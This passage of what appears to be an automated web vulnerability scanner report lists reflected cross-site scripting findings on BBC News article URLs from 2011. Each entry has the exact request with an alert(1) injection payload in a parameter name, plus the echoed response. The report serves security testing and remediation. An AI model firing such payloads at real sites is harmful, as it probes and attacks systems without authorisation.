Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=244d6515ee2a2530daa384e071544e25a50ee6f50040f1e97bab33df91d5c7aa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=244d6515ee2a2530daa384e071544e25a50ee6f50040f1e97bab33df91d5c7aa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476176000,
       editionToServe: 'us',
       queryString: '8a110'-alert(1)-'20c3a9d2c2=1',
       referrer: null,
       section: 'education',
       sectionPath: '/Education',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429152',
       assetType: 'story',

...[SNIP]...

1.13. http://www.bbc.co.uk/news/entertainment-arts-12426999 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f07bd'-alert(1)-'b372a7edb81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12426999?f07bd'-alert(1)-'b372a7edb81=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=f41db5d5eeaa35605a26917f61d793ffd0ef98fb4030f1e95b8b12ea967c84460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f41db5d5eeaa35605a26917f61d793ffd0ef98fb4030f1e95b8b12ea967c84460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476176000,
       editionToServe: 'us',
       queryString: 'f07bd'-alert(1)-'b372a7edb81=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12426999'
...[SNIP]...

1.14. http://www.bbc.co.uk/news/entertainment-arts-12427905 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a903e'-alert(1)-'67ad5e60a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12427905?a903e'-alert(1)-'67ad5e60a6d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=149d05156e3a15d05af95fc331c51508f409f26b201061394b0b83ae6e8b9cee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=149d05156e3a15d05af95fc331c51508f409f26b201061394b0b83ae6e8b9cee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476176000,
       editionToServe: 'us',
       queryString: 'a903e'-alert(1)-'67ad5e60a6d=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427905'
...[SNIP]...

1.15. http://www.bbc.co.uk/news/entertainment-arts-12428196 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f9e8'-alert(1)-'db7a0eecb55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/entertainment-arts-12428196?5f9e8'-alert(1)-'db7a0eecb55=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=754
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=942dc5b5aeda25a19be73cb881544b6db2ff297f40e092b3873deab028a16b7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=942dc5b5aeda25a19be73cb881544b6db2ff297f40e092b3873deab028a16b7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476177000,
       editionToServe: 'us',
       queryString: '5f9e8'-alert(1)-'db7a0eecb55=1',
       referrer: null,
       section: 'entertainment-and-arts',
       sectionPath: '/Entertainment and Arts',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428196'
...[SNIP]...

1.16. http://www.bbc.co.uk/news/health-12401970 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57982'-alert(1)-'bf66a815b89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12401970?57982'-alert(1)-'bf66a815b89=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=798
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=148da5a5ee5a25a17a780372d1c88a798cae299d90b061195bdbe26c4d351f6c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=148da5a5ee5a25a17a780372d1c88a798cae299d90b061195bdbe26c4d351f6c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476177000,
       editionToServe: 'us',
       queryString: '57982'-alert(1)-'bf66a815b89=1',
       referrer: null,
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12401970',
       assetType: 'story',
       uri:
...[SNIP]...

1.17. http://www.bbc.co.uk/news/health-12409700 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42623'-alert(1)-'1343e26dedd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12409700?42623'-alert(1)-'1343e26dedd=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=24cd35e51e2a855148fdb629b18cc4c30e820e6180b00203179d3ac05573babe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd35e51e2a855148fdb629b18cc4c30e820e6180b00203179d3ac05573babe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476177000,
       editionToServe: 'us',
       queryString: '42623'-alert(1)-'1343e26dedd=1',
       referrer: null,
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12409700',
       assetType: 'story',
       uri:
...[SNIP]...

1.18. http://www.bbc.co.uk/news/health-12415801 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e518d'-alert(1)-'39e9b4e2cd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/health-12415801?e518d'-alert(1)-'39e9b4e2cd1=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:59 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:59 GMT
Connection: close
Set-Cookie: BBC-UID=b4fde505feaa15f3cad6509b5121491f4ce4689750d0013a247b0ac52fe13c660Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4fde505feaa15f3cad6509b5121491f4ce4689750d0013a247b0ac52fe13c660Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476179000,
       editionToServe: 'us',
       queryString: 'e518d'-alert(1)-'39e9b4e2cd1=1',
       referrer: null,
       section: 'health',
       sectionPath: '/Health',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12415801',
       assetType: 'story',
       uri:
...[SNIP]...

1.19. http://www.bbc.co.uk/news/magazine-12392811 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9b13'-alert(1)-'d947613eeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12392811?a9b13'-alert(1)-'d947613eeb=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=242db555dedad5751bf949e701c95db53317ed6a7050e1ca443baae4617c629c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=242db555dedad5751bf949e701c95db53317ed6a7050e1ca443baae4617c629c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476181000,
       editionToServe: 'us',
       queryString: 'a9b13'-alert(1)-'d947613eeb=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12392811',
       assetType: 'story',
       
...[SNIP]...

1.20. http://www.bbc.co.uk/news/magazine-12418046 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef37f'-alert(1)-'b107016d690 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12418046?ef37f'-alert(1)-'b107016d690=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:10 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:10 GMT
Connection: close
Set-Cookie: BBC-UID=84bdb5554eda859e4a2d68dde1a7b2e12691189b5010c1e92b4be32ea04e24ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84bdb5554eda859e4a2d68dde1a7b2e12691189b5010c1e92b4be32ea04e24ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476190000,
       editionToServe: 'us',
       queryString: 'ef37f'-alert(1)-'b107016d690=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12418046',
       assetType: 'story',
       
...[SNIP]...

1.21. http://www.bbc.co.uk/news/magazine-12428754 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f4c7'-alert(1)-'a1c3f041513 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12428754?2f4c7'-alert(1)-'a1c3f041513=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=765
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=34cd3575be3ac5355ac1245c910de6c3c9cd7993d0b0c1b91b2b03b2c75de95e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34cd3575be3ac5355ac1245c910de6c3c9cd7993d0b0c1b91b2b03b2c75de95e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476181000,
       editionToServe: 'us',
       queryString: '2f4c7'-alert(1)-'a1c3f041513=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428754',
       assetType: 'story',
       
...[SNIP]...

1.22. http://www.bbc.co.uk/news/magazine-12428759 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 474a9'-alert(1)-'6d1c4d80a64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/magazine-12428759?474a9'-alert(1)-'6d1c4d80a64=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:05 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:05 GMT
Connection: close
Set-Cookie: BBC-UID=942dc5650e8a05693bc979a9218a73dcb766010350c0f1ea548bea84dcee88fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=942dc5650e8a05693bc979a9218a73dcb766010350c0f1ea548bea84dcee88fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476185000,
       editionToServe: 'us',
       queryString: '474a9'-alert(1)-'6d1c4d80a64=1',
       referrer: null,
       section: 'magazine',
       sectionPath: '/Magazine',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428759',
       assetType: 'story',
       
...[SNIP]...

1.23. http://www.bbc.co.uk/news/science-environment-12412662 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a35a'-alert(1)-'9d835525957 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12412662?8a35a'-alert(1)-'9d835525957=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:03 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:03 GMT
Connection: close
Set-Cookie: BBC-UID=54ddb545ce1a35279a7fe62871177c3b03c334d710d051aa14cb2a84d63c50540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54ddb545ce1a35279a7fe62871177c3b03c334d710d051aa14cb2a84d63c50540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476183000,
       editionToServe: 'us',
       queryString: '8a35a'-alert(1)-'9d835525957=1',
       referrer: null,
       section: 'science-and-environment',
       sectionPath: '/Science and Environment',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '1241266
...[SNIP]...

1.24. http://www.bbc.co.uk/news/science-environment-12417858 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c0d'-alert(1)-'1fc2efe71c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/science-environment-12417858?34c0d'-alert(1)-'1fc2efe71c4=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:03 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:03 GMT
Connection: close
Set-Cookie: BBC-UID=545d2575aeaa552716cbef36c179dad3a189880ed060e1ba34eb6a558d80daba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:03 GMT; path=/; domain=bbc.co.uk;
